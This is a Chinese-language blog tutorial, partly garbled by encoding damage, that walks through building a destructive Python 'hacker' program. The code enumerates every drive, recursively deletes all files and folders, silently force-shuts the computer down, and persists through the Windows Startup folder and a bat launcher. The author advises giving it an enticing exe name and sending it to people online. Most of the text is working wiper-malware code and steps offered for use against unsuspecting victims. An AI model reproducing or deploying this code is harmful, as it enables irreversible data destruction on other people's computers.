點(diǎn)擊上面的“爬蟲和數(shù)據(jù)挖掘”進(jìn)行關(guān)注
回復(fù)“圖書”共收到10本電子書�����,從初級(jí)到高級(jí)
今天
日
雞
湯
溫?zé)岬难菏钦洳氐?�,灑上它仍然可以轉(zhuǎn)動(dòng)藍(lán)色的波浪����。
/1 簡(jiǎn)介/
隨著信息時(shí)代的到來(lái)���,人們與互聯(lián)網(wǎng)的接觸越來(lái)越廣泛,這讓很多人向往黑客�,并試圖通過互聯(lián)網(wǎng)的虛擬世界做一些有趣的事情。
所以今天我們要談?wù)勥@個(gè)工具:如何制作一個(gè)黑客軟件�����。眾所周知����,黑客入侵操作系統(tǒng)的常用方法是發(fā)送木馬客戶端,修改系統(tǒng)注冊(cè)表����、組策略,獲取啟動(dòng)權(quán)限���,入侵計(jì)算機(jī)�,然后修改計(jì)算機(jī)文件��,達(dá)到不可告人的目的��。
/2 項(xiàng)目目標(biāo)/
今天我們就來(lái)聊聊最基礎(chǔ)的,是怎么開始啟動(dòng)的���,首先就跟大家講講最基礎(chǔ)的把文件加到系統(tǒng)啟動(dòng)項(xiàng)的文件夾里���,當(dāng)然也可以用注冊(cè)表添加更多高端點(diǎn),這里就不贅述了�。
/3 項(xiàng)目準(zhǔn)備 /
用文本 3 編寫代碼并逐步實(shí)現(xiàn)該過程。
/4 實(shí)施步驟/
1.首先�����,我們通過社會(huì)工程進(jìn)行分析��,并準(zhǔn)備一個(gè)足夠吸引人的exe文件名�,讓人們一見鐘情;別人點(diǎn)擊程序后�����,沒有回應(yīng)�����,所以有些人可能會(huì)在程序上多點(diǎn)擊幾次�,當(dāng)然�,這對(duì)程序沒有任何影響��。
2.首先�,我們需要獲取系統(tǒng)驅(qū)動(dòng)器號(hào)sublime text python,我們可以使用os模塊通過環(huán)境變量的字典鍵來(lái)獲取當(dāng)前的系統(tǒng)驅(qū)動(dòng)器號(hào)����。
import osprint(os.getenv('SystemDrive'))
3.拿到盤符后,我們可以打印出他目錄中的文件和文件夾�。
aa=os.getenv('SystemDrive')os.chdir(aa+'\\\\') \os.system('tree\>\>1.txt') 打印樹形目錄并將其結(jié)果保存到1.txt文件中
4.然后,我們只需要?jiǎng)h除驅(qū)動(dòng)器號(hào)下的文件夾和文件即可�。所以我們需要用os遍歷遍歷當(dāng)前驅(qū)動(dòng)器號(hào)下的所有文件,然后使用方法和rmdir方法����,一個(gè)是刪除文件,另一個(gè)是刪除目錄�����。由于沒有虛擬機(jī)�����,我創(chuàng)建一個(gè)目錄����,并在其中放置幾個(gè)文件夾和文件�,效果是一樣的����。
path = r"C:\\Users\\Administrator\\Desktop\\sa"
os.walk()?方法用于通過在目錄樹中游走輸出在目錄中的文件名,向上或者向下���。os.walk() 方法是一個(gè)簡(jiǎn)單易用的文件���、目錄遍歷器,可以幫助我們高效的處理文件�、目錄方面的事情。
語(yǔ)法:
os.walk(top[, topdown=True[, onerror=None[, followlinks=False]]])
參數(shù):
top -- 根目錄下的每一個(gè)文件夾(包含它自己), 產(chǎn)生3-元組 (dirpath, dirnames,filenames)【文件夾路徑, 文件夾名字, 文件名】topdown?--可選�����,為True或者沒有指定一個(gè)目錄的3-元組將比它的任何子文件夾的3-元組先產(chǎn)生?(目錄自上而下)��。
如果topdown為 False, 一個(gè)目錄的3-元組將比它的任何子文件夾的3-元組后產(chǎn)生(目錄自下而上)���。
onerror --?可選,是一個(gè)函數(shù);?它調(diào)用時(shí)有一個(gè)參數(shù), 一個(gè)OSError實(shí)例�����。報(bào)告這錯(cuò)誤后,繼續(xù)walk, 或者拋出exception終止walk��。
for root,dirs,files in os.walk(path,topdown=False):\#遍歷目錄
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
其實(shí)還有另外一種方式�����,那就是��。(路徑)但是他會(huì)刪除目錄本身以及所有子文件夾和文件�����,也就是說���,他會(huì)刪除SA目錄��,所以不建議這樣做��,因?yàn)槲覀円獎(jiǎng)h除驅(qū)動(dòng)器號(hào)下的文件夾或文件���,這很容易導(dǎo)致未知錯(cuò)誤。
5.拿到系統(tǒng)盤符后���,我們還是想拿到系統(tǒng)中的其他盤符����,怎么辦,不用擔(dān)心���,我們可以試試以下方法�����。
import os
import string
def get_pan():
disk_list=[] \
for p in string.ascii_uppercase: \
disk=p+':'
if os.path.isdir(disk): \
disk_list.append(disk) \
return disk_list
print(get_pan())
結(jié)果很完美����,完全符合我的預(yù)期���,甚至打印了 USB 驅(qū)動(dòng)器號(hào)�。
6. 僅僅打印一個(gè)磁盤目錄文件似乎有點(diǎn)美中不足��,所以我決定把所有的磁盤目錄文件都做出來(lái)����,和以前一樣sublime text python����,或者做一個(gè)樹狀結(jié)構(gòu)��。
這樣�����,每個(gè)磁盤的目錄結(jié)構(gòu)都保存在相應(yīng)磁盤的2.txt文件中�。
7.然后我們會(huì)刪除這些驅(qū)動(dòng)器號(hào)下的所有目錄文件�,當(dāng)然是遍歷和刪除,為了模擬真實(shí)場(chǎng)景��,我決定用多層文件和目錄替換幾個(gè)文件夾的驅(qū)動(dòng)器號(hào)�����,這里我就不一一截圖了�����,直接在代碼上��,和以前一樣����。
g=['C:\\\\Users\\\\Administrator\\\\Desktop\\\\sa\\\\','C:\\\\Users\\\\Administrator\\\\Desktop\\\\qq\\\\','C:\\\\Users\\\\Administrator\\\\Desktop\\\\sq\\\\']
for y in g:
for root, dirs, files in os.walk(y,topdown=False):\#遍歷目錄
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
好的���,我們已經(jīng)刪除了所有文件和目錄。
8.刪除文件后����,系統(tǒng)自然不會(huì)正常運(yùn)行,所以我們可以在這個(gè)時(shí)候關(guān)閉電腦�����。 ���,我的選擇�,這里我們調(diào)用命令:
os.popen('shutdown?/f?/sg')
參數(shù)說明:
/f 強(qiáng)制關(guān)閉正在運(yùn)行的應(yīng)用程序而不事先警告用戶�����。/sg 關(guān)閉計(jì)算機(jī)���。在下一次啟動(dòng)時(shí)���,重啟任何注冊(cè)的應(yīng)用程序�����。
這樣它可以在沒有任何提示的情況下關(guān)閉,不被注意�����,哈哈哈��。
9.當(dāng)然����,這個(gè)操作要根據(jù)文件操作的結(jié)束進(jìn)行,并且會(huì)再次優(yōu)化��。
g=['C:\\\\Users\\\\Administrator\\\\Desktop\\\\sa\\\\','C:\\\\Users\\\\Administrator\\\\Desktop\\\\qq\\\\','C:\\\\Users\\\\Administrator\\\\Desktop\\\\sq\\\\']
for y in g:
try:
#遍歷目錄
for root, dirs, files in os.walk(y,topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
time.sleep(1)
except Exception:
pass
finally:
os.popen('shutdown /f /sg')\#不彈出黑窗口
我們把程序發(fā)到互聯(lián)網(wǎng)上�,幸好有人點(diǎn)擊了它,所以我們要在自動(dòng)啟動(dòng)目錄下做文件��,然后每次啟動(dòng)程序���,程序就會(huì)啟動(dòng)�。但是這里有一個(gè)缺點(diǎn)���,你希望別人把那個(gè)文件放在引導(dǎo)目錄中��,這是一個(gè)夢(mèng)想�����,當(dāng)然�,這些操作可以通過將這些操作留給全能者來(lái)一步完成。我們可以點(diǎn)擊這個(gè)文件快速生成一個(gè)bat文件和一個(gè)EXE文件或文件����。
10.這里我主要是拿和擊球,因?yàn)槲疫€沒有打包����。
自啟動(dòng)目錄路徑:
C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup
import shutil
shutil.copyfile('gc.py',r'C:\\ProgramData\\Microsoft\\Windows\\StartMenu\\Programs\\StartUp\\gc1.py')
這里我們用這個(gè)模塊,操作文件目錄的方法是將當(dāng)前資源文件復(fù)制到另一個(gè)目錄中的文件���,但需要注意的是�,兩個(gè)文件名一定不能相同��,否則會(huì)報(bào)錯(cuò)��,雖然他可以復(fù)制�,但如果必須使用這個(gè)方法����, 請(qǐng)記住拋出異常��。
11.好了���,現(xiàn)在好了,效果如下����。
12.那么我們還需要一個(gè)蝙蝠來(lái)啟動(dòng)它,因?yàn)闆]有蝙蝠���,他需要借助外力點(diǎn)擊才能產(chǎn)生效果�,而有了蝙蝠�����,它就可以自動(dòng)啟動(dòng)���。
創(chuàng)建一個(gè)后綴為 bat 的文件�,內(nèi)容如下:
一樣��。我們還是需要我們智能生成bat文件那么怎么寫,很簡(jiǎn)單�,有人問我為什么不呢,因?yàn)榍罢哌\(yùn)行后沒有黑窗��,當(dāng)然不管是創(chuàng)建bat文件還是復(fù)制程序文件��,最好在刪除后調(diào)用�,有人問我,你的文件被刪除了�����。離開那個(gè)有什么用��?�����,哈哈哈哈�����,我只能說��,只是為了娛樂�����。。���。
13. 回到主題�,只需要?jiǎng)?chuàng)建程序文件就可以了�。
14.這樣一來(lái),就算完成了���,那我們也可以打包文件,這樣就不需要在bat文件中寫解釋器了����,因?yàn)橛行┠繕?biāo)電腦可能沒有環(huán)境,這個(gè)時(shí)候就需要打包了�����。打包后���,直接將bat文件的內(nèi)容改為:
start gc.exe
就是這樣~~
打包成exe文件后����,就可以發(fā)給網(wǎng)上其他人了,哈哈哈~~
/5 總結(jié)/
1.本文基于庫(kù)�����,獲取驅(qū)動(dòng)器號(hào)信息�,然后使用命令強(qiáng)行刪除驅(qū)動(dòng)器號(hào)下的文件和自動(dòng)關(guān)機(jī)功能,并封裝程序�,可以創(chuàng)建一個(gè)簡(jiǎn)單的“黑客”工具。
2.一般來(lái)說就是介紹每個(gè)系統(tǒng)的相關(guān)模塊的使用�����,以及一些cmd命令的使用�����,這并不難�����,可以用于普通練習(xí)����,與專業(yè)的黑客技術(shù)相比,這是一件小事。
如有侵權(quán)請(qǐng)聯(lián)系刪除��!
TAGS:
